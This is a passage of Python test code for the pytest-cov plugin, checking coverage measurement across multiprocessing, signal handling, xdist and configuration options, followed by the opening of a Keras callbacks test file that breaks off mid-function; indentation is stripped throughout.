assert "Doesn't seem to be a coverage.py data file" not in result.stdout.str()
assert "Doesn't seem to be a coverage.py data file" not in result.stderr.str()
assert not testdir.tmpdir.listdir(".coverage.*")
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_pool* 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
@pytest.mark.skipif('platform.python_implementation() == "PyPy"', reason="often deadlocks on PyPy")
@pytest.mark.skipif('sys.version_info[:2] >= (3, 8)', reason="deadlocks on Python 3.8, see: https://bugs.python.org/issue38227")
def test_multiprocessing_pool_terminate(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn(a):
%sse: # pragma: nocover
return None
def test_run_target():
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
for i in range(33):
p = multiprocessing.Pool(3)
try:
p.map(target_fn, [i * 3 + j for j in range(3)])
finally:
p.terminate()
p.join()
''' % ''.join('''if a == %r:
return a
el''' % i for i in range(99)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert "Doesn't seem to be a coverage.py data file" not in result.stdout.str()
assert "Doesn't seem to be a coverage.py data file" not in result.stderr.str()
assert not testdir.tmpdir.listdir(".coverage.*")
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_pool* 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
@pytest.mark.skipif('sys.version_info[0] > 2 and platform.python_implementation() == "PyPy"', reason="broken on PyPy3")
def test_multiprocessing_pool_close(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn(a):
%sse: # pragma: nocover
return None
def test_run_target():
for i in range(33):
p = multiprocessing.Pool(3)
try:
p.map(target_fn, [i * 3 + j for j in range(3)])
finally:
p.close()
p.join()
''' % ''.join('''if a == %r:
return a
el''' % i for i in range(99)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert "Doesn't seem to be a coverage.py data file" not in result.stdout.str()
assert "Doesn't seem to be a coverage.py data file" not in result.stderr.str()
assert not testdir.tmpdir.listdir(".coverage.*")
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_pool* 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
def test_multiprocessing_process(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_process* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
def test_multiprocessing_process_no_source(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_process* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
def test_multiprocessing_process_with_terminate(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
import time
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
event = multiprocessing.Event()
def target_fn():
a = True
event.set()
time.sleep(5)
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
time.sleep(0.5)
event.wait(1)
p.terminate()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_process* 16 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="SIGTERM isn't really supported on Windows")
def test_cleanup_on_sigterm(testdir):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def cleanup(num, frame):
print("num == signal.SIGTERM => %s" % (num == signal.SIGTERM))
raise Exception()
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.terminate()
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b"""num == signal.SIGTERM => True
captured Exception()
"""
assert proc.returncode == 0
if __name__ == "__main__":
signal.signal(signal.SIGTERM, cleanup)
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* 26-27',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform != "win32"')
@pytest.mark.parametrize('setup', [
('signal.signal(signal.SIGBREAK, signal.SIG_DFL); cleanup_on_signal(signal.SIGBREAK)', '87% 21-22'),
('cleanup_on_signal(signal.SIGBREAK)', '87% 21-22'),
('cleanup()', '73% 19-22'),
])
def test_cleanup_on_sigterm_sig_break(testdir, setup):
# worth a read: https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen(
[sys.executable, __file__],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP, shell=True
)
time.sleep(1)
proc.send_signal(signal.CTRL_BREAK_EVENT)
stdout, stderr = proc.communicate()
assert not stderr
assert stdout in [b"^C", b"", b"captured IOError(4, 'Interrupted function call')\\n"]
if __name__ == "__main__":
from pytest_cov.embed import cleanup_on_signal, cleanup
''' + setup[0] + '''
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* %s' % setup[1],
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="SIGTERM isn't really supported on Windows")
@pytest.mark.parametrize('setup', [
('signal.signal(signal.SIGTERM, signal.SIG_DFL); cleanup_on_sigterm()', '88% 18-19'),
('cleanup_on_sigterm()', '88% 18-19'),
('cleanup()', '75% 16-19'),
])
def test_cleanup_on_sigterm_sig_dfl(testdir, setup):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.terminate()
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b""
assert proc.returncode in [128 + signal.SIGTERM, -signal.SIGTERM]
if __name__ == "__main__":
from pytest_cov.embed import cleanup_on_sigterm, cleanup
''' + setup[0] + '''
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* %s' % setup[1],
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="SIGINT is subtly broken on Windows")
def test_cleanup_on_sigterm_sig_dfl_sigint(testdir):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.send_signal(signal.SIGINT)
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b"""captured KeyboardInterrupt()
"""
assert proc.returncode == 0
if __name__ == "__main__":
from pytest_cov.embed import cleanup_on_signal
cleanup_on_signal(signal.SIGINT)
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* 88% 19-20',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="fork not available on Windows")
def test_cleanup_on_sigterm_sig_ign(testdir):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.send_signal(signal.SIGINT)
time.sleep(1)
proc.terminate()
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b""
# it appears signal handling is buggy on python 2?
if sys.version_info == 3: assert proc.returncode in [128 + signal.SIGTERM, -signal.SIGTERM]
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_IGN)
from pytest_cov.embed import cleanup_on_signal
cleanup_on_signal(signal.SIGINT)
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* 89% 23-24',
'*1 passed*'
])
assert result.ret == 0
MODULE = '''
def func():
return 1
'''
CONFTEST = '''
import mod
mod.func()
'''
BASIC_TEST = '''
def test_basic():
x = True
assert x
'''
CONF_RESULT = 'mod* 2 * 100%*'
def test_cover_conftest(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_cover_looponfail(testdir, monkeypatch):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
def mock_run(*args, **kwargs):
return _TestProcess(*map(str, args))
monkeypatch.setattr(testdir, 'run', mock_run)
assert testdir.run is mock_run
if hasattr(testdir, '_pytester'):
monkeypatch.setattr(testdir._pytester, 'run', mock_run)
assert testdir._pytester.run is mock_run
with testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--looponfail',
script) as process:
with dump_on_error(process.read):
wait_for_strings(
process.read,
30, # 30 seconds
'Stmts Miss Cover'
)
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_cover_conftest_dist(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
def test_no_cover_marker(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import pytest
import mod
import subprocess
import sys
@pytest.mark.no_cover
def test_basic():
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
def test_no_cover_fixture(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import mod
import subprocess
import sys
def test_basic(no_cover):
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
COVERAGERC = '''
[report]
# Regexes for lines to exclude from consideration
exclude_lines =
raise NotImplementedError
'''
EXCLUDED_TEST = '''
def func():
raise NotImplementedError
def test_basic():
x = True
assert x
'''
EXCLUDED_RESULT = '4 * 100%*'
def test_coveragerc(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['test_coveragerc* %s' % EXCLUDED_RESULT])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_coveragerc_dist(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '2',
max_worker_restart_0,
script)
assert result.ret == 0
result.stdout.fnmatch_lines(
['test_coveragerc_dist* %s' % EXCLUDED_RESULT])
SKIP_COVERED_COVERAGERC = '''
[report]
skip_covered = True
'''
SKIP_COVERED_TEST = '''
def func():
return "full coverage"
def test_basic():
assert func() == "full coverage"
'''
SKIP_COVERED_RESULT = '1 file skipped due to complete coverage.'
@pytest.mark.parametrize('report_option', [
'term-missing:skip-covered',
'term:skip-covered'])
def test_skip_covered_cli(testdir, report_option):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=%s' % report_option,
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
def test_skip_covered_coveragerc_config(testdir):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
CLEAR_ENVIRON_TEST = '''
import os
def test_basic():
os.environ.clear()
'''
def test_clear_environ(testdir):
script = testdir.makepyfile(CLEAR_ENVIRON_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
SCRIPT_SIMPLE = '''
def test_foo():
assert 1 == 1
x = True
assert x
'''
SCRIPT_SIMPLE_RESULT = '4 * 100%'
@pytest.mark.skipif('sys.platform == "win32"')
def test_dist_boxed(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--boxed',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_boxed* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"')
@pytest.mark.skipif('sys.version_info[0] > 2 and platform.python_implementation() == "PyPy"',
reason="strange optimization on PyPy3")
def test_dist_bare_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov',
'-n', '1',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_bare_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_not_started_plugin_does_not_fail(testdir):
class ns:
cov_source = [True]
cov_report = ''
plugin = pytest_cov.plugin.CovPlugin(ns, None, start=False)
plugin.pytest_runtestloop(None)
plugin.pytest_terminal_summary(None)
def test_default_output_setting(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*coverage*'
])
assert result.ret == 0
def test_disabled_output(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
script)
stdout = result.stdout.str()
# We don't want the path to the executable to fail the test if we happen
# to put the project in a directory with "coverage" in it.
stdout = stdout.replace(sys.executable, "<SYS.EXECUTABLE>")
assert 'coverage' not in stdout
assert result.ret == 0
def test_coverage_file(testdir):
script = testdir.makepyfile(SCRIPT)
data_file_name = 'covdata'
os.environ['COVERAGE_FILE'] = data_file_name
try:
result = testdir.runpytest('-v', '--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
data_file = testdir.tmpdir.join(data_file_name)
assert data_file.check()
finally:
os.environ.pop('COVERAGE_FILE')
def test_external_data_file(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_external_data_file_xdist(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
parallel = true
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'-n', '1',
max_worker_restart_0,
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_xdist_no_data_collected(testdir):
testdir.makepyfile(target="x = 123")
script = testdir.makepyfile("""
import target
def test_foobar():
assert target.x == 123
""")
result = testdir.runpytest('-v',
'--cov=target',
'-n', '1',
script)
assert 'no-data-collected' not in result.stderr.str()
assert 'no-data-collected' not in result.stdout.str()
assert 'module-not-imported' not in result.stderr.str()
assert 'module-not-imported' not in result.stdout.str()
assert result.ret == 0
def test_external_data_file_negative(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('.coverage*')))
@xdist_params
def test_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov-append',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
'test_2* %s*' % prop.result2,
])
@xdist_params
def test_do_not_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* 0%',
'test_2* %s*' % prop.result2,
])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_append_coverage_subprocess(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-append',
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_pth_failure(monkeypatch):
with open('src/pytest-cov.pth') as fh:
payload = fh.read()
class SpecificError(Exception):
pass
def bad_init():
raise SpecificError()
buff = StringIO()
from pytest_cov import embed
monkeypatch.setattr(embed, 'init', bad_init)
monkeypatch.setattr(sys, 'stderr', buff)
monkeypatch.setitem(os.environ, 'COV_CORE_SOURCE', 'foobar')
exec(payload)
assert buff.getvalue() == '''pytest-cov: Failed to setup subprocess coverage. Environ: {'COV_CORE_SOURCE': 'foobar'} Exception: SpecificError()
'''
def test_double_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov', '--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_double_cov2(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov', '--cov',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov2* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_cov_reset(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-reset',
script)
assert 'coverage: platform' not in result.stdout.str()
def test_cov_reset_then_set(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-reset',
'--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cov_reset_then_set* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_cov_and_no_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov', '--no-cov',
'-n', '1',
'-s',
script)
assert 'Coverage disabled via --no-cov switch!' not in result.stdout.str()
assert 'Coverage disabled via --no-cov switch!' not in result.stderr.str()
assert result.ret == 0
def find_labels(text, pattern):
all_labels = collections.defaultdict(set)
lines = text.splitlines()
for lineno, line in enumerate(lines, start=1):
labels = re.findall(pattern, line)
for label in labels:
all_labels[label].add(lineno)
return all_labels
# The contexts and their labels in contextful.py
EXPECTED_CONTEXTS = {
'': 'c0',
'test_contexts.py::test_01|run': 'r1',
'test_contexts.py::test_02|run': 'r2',
'test_contexts.py::OldStyleTests::test_03|setup': 's3',
'test_contexts.py::OldStyleTests::test_03|run': 'r3',
'test_contexts.py::OldStyleTests::test_04|run': 'r4',
'test_contexts.py::OldStyleTests::test_04|teardown': 't4',
'test_contexts.py::test_05|setup': 's5',
'test_contexts.py::test_05|run': 'r5',
'test_contexts.py::test_06|setup': 's6',
'test_contexts.py::test_06|run': 'r6',
'test_contexts.py::test_07|setup': 's7',
'test_contexts.py::test_07|run': 'r7',
'test_contexts.py::test_08|run': 'r8',
'test_contexts.py::test_09[1]|setup': 's9-1',
'test_contexts.py::test_09[1]|run': 'r9-1',
'test_contexts.py::test_09[2]|setup': 's9-2',
'test_contexts.py::test_09[2]|run': 'r9-2',
'test_contexts.py::test_09[3]|setup': 's9-3',
'test_contexts.py::test_09[3]|run': 'r9-3',
'test_contexts.py::test_10|run': 'r10',
'test_contexts.py::test_11[1-101]|run': 'r11-1',
'test_contexts.py::test_11[2-202]|run': 'r11-2',
'test_contexts.py::test_12[one]|run': 'r12-1',
'test_contexts.py::test_12[two]|run': 'r12-2',
'test_contexts.py::test_13[3-1]|run': 'r13-1',
'test_contexts.py::test_13[3-2]|run': 'r13-2',
'test_contexts.py::test_13[4-1]|run': 'r13-3',
'test_contexts.py::test_13[4-2]|run': 'r13-4',
}
@pytest.mark.skipif("coverage.version_info < (5, 0)")
@xdist_params
def test_contexts(testdir, opts):
with open(os.path.join(os.path.dirname(__file__), "contextful.py")) as f:
contextful_tests = f.read()
script = testdir.makepyfile(contextful_tests)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-context=test',
script,
*opts.split()
)
assert result.ret == 0
result.stdout.fnmatch_lines([
'test_contexts* 100%*',
])
data = coverage.CoverageData(".coverage")
data.read()
assert data.measured_contexts() == set(EXPECTED_CONTEXTS)
measured = data.measured_files()
assert len(measured) == 1
test_context_path = list(measured)[0]
assert test_context_path.lower() == os.path.abspath("test_contexts.py").lower()
line_data = find_labels(contextful_tests, r"[crst]\d+(?:-\d+)?")
for context, label in EXPECTED_CONTEXTS.items():
if context == '':
continue
data.set_query_context(context)
actual = set(data.lines(test_context_path))
assert line_data[label] == actual, f"Wrong lines for context {context!r}"
@pytest.mark.skipif("coverage.version_info >= (5, 0)")
def test_contexts_not_supported(testdir):
script = testdir.makepyfile("a = 1")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-context=test',
script,
)
result.stderr.fnmatch_lines([
'*argument --cov-context: Contexts are only supported with coverage.py >= 5.x',
])
assert result.ret != 0
def test_issue_417(testdir):
# https://github.com/pytest-dev/pytest-cov/issues/417
whatever = testdir.maketxtfile(whatever="")
testdir.inline_genitems(whatever)
|
test_callbacks.py
|
import os
import sys
import multiprocessing
import numpy as np
import pytest
from keras import optimizers
np.random.seed(1337)
from keras import callbacks
from keras.models import Graph, Sequential
from keras.layers.core import Dense
from keras.utils.test_utils import get_test_data
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
nb_hidden = 4
nb_class = 2
batch_size = 5
train_samples = 20
test_samples = 20
def test_ModelCheckpoint():
filepath = 'checkpoint.h5'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
def test_EarlyStopping():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
def test_EarlyStopping_reuse():
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
def test_LearningRateScheduler():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
